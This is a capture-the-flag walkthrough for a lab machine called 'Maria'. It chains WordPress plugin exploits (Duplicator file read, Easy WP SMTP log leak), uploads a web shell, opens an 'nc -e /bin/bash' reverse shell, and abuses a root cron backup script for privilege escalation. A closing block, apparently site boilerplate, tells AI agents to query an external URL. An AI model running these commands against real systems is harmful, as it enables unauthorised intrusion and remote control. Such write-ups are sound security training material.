# Maria ### Enumeration ``` 21/tcp open ftp vsftpd 3.0.3 | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_drwxr-xr-x 5 0 0 4096 Sep 21 2018 automysqlbackup 80/tcp open http Apache httpd 2.4.38 ((Debian)) |_http-generator: WordPress 5.7.1 | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.38 (Debian) |_http-title: Maria 3306/tcp open mysql MySQL 5.5.5-10.3.27-MariaDB-0+deb10u1 | mysql-info: | Protocol: 10 | Version: 5.5.5-10.3.27-MariaDB-0+deb10u1 ``` ``` $ wpscan --url http://192.168.153.167/ --api-token [REDACTED] [+] WordPress version 5.7.1 identified [I] duplicator v1.3.26 [I] easy-wp-smtp v1.4.1 ``` ``` $ searchsploit wordpress easy wp smtp Unpatched WordPress Easy WP SMTP installs version 1.4.2 or earlier. - Sensitive Data Exposure $ searchsploit wordpress duplicator Wordpress Plugin Duplicator 1.3.26 - Unauthentica | php/webapps/49288.rb Exploit: Wordpress Plugin Duplicator 1.3.26 - Unauthenticated Arbitrary File Read (Metasploit) ``` ``` EASY WP SMTP - https://www.exploit-db.com/exploits/50420 URL = arg + "/wp-admin/admin-ajax.php?action=duplicator_download&file=../../../../../../../../.." + file ``` ``` > set FILEPATH /etc/default/automysqlbackup # Username to access the MySQL server e.g. dbuser USERNAME=backup # Username to access the MySQL server e.g. password PASSWORD=[REDACTED] # Host name (or IP address) of MySQL server e.g localhost DBHOST=localhost ``` ``` $ mysql --host=192.168.153.167 -u backup -p MariaDB [wordpress]> select user_login,user_pass from wp_users; +------------+------------------------------------+ | user_login | user_pass | +------------+------------------------------------+ | admin | $P$[REDACTED] | +------------+------------------------------------+ 1 row in set (0.145 sec) ``` I could not crack the password with rockyou. With the other exploit, we can use mysql to identfiy the log file to get admin reset link. Wordpress -> Forgot password -> admin ``` MariaDB [wordpress]> select option_value from wp_options where option_name = 'swpsmtp_options'; ... "enable_debug";i:1 "log_file_name";s:27:"618690b555268_debug_log.txt";} ``` ``` > set FILEPATH /var/www/html/wordpress/wp-content/plugins/easy-wp-smtp/618690b555268_debug_log.txt CLIENT -> SERVER: http://192.168.117.167/wp-login.php?action=rp&key=IRYLUQIp7Pl9LHhLkdbr&login=admin ``` Open the link, reset the admin password. Then login with new password. ### Initial Access ``` $ cp /usr/share/seclists/Web-Shells/WordPress/plugin-shell.php . $ sudo zip plugin-shell.zip plugin-shell.php ``` Plugins -> Add New -> Upload Plugin -> Browse -> plugin-shell.zip -> Install Now ``` http://192.168.117.167/wp-content/plugins/plugin-shell/plugin-shell.php?cmd=nc%20-e%20/bin/bash%20192.168.49.117%2080 ``` ### PrivEsc ``` /etc/cron.d/automysqlbackup www-data@maria:/var/mail$ cat /etc/cron.d/automysqlbackup */1 * * * * root /usr/sbin/automysqlbackup cat /etc/default/automysqlbackup # Command run after backups (uncomment to use) POSTBACKUP=/var/www/html/wordpress/backup_scripts/backup-post ``` ``` cat << EOF > /var/www/html/wordpress/backup_scripts/backup-post > /bin/bash -c '/usr/bin/nc -e /bin/bash 192.168.49.117 80' > EOF chmod +x /var/www/html/wordpress/backup_scripts/backup-post ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://cel1s0.gitbook.io/offsec-notes/walkthroughs/pg-practice/linux/get-to-work/maria.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.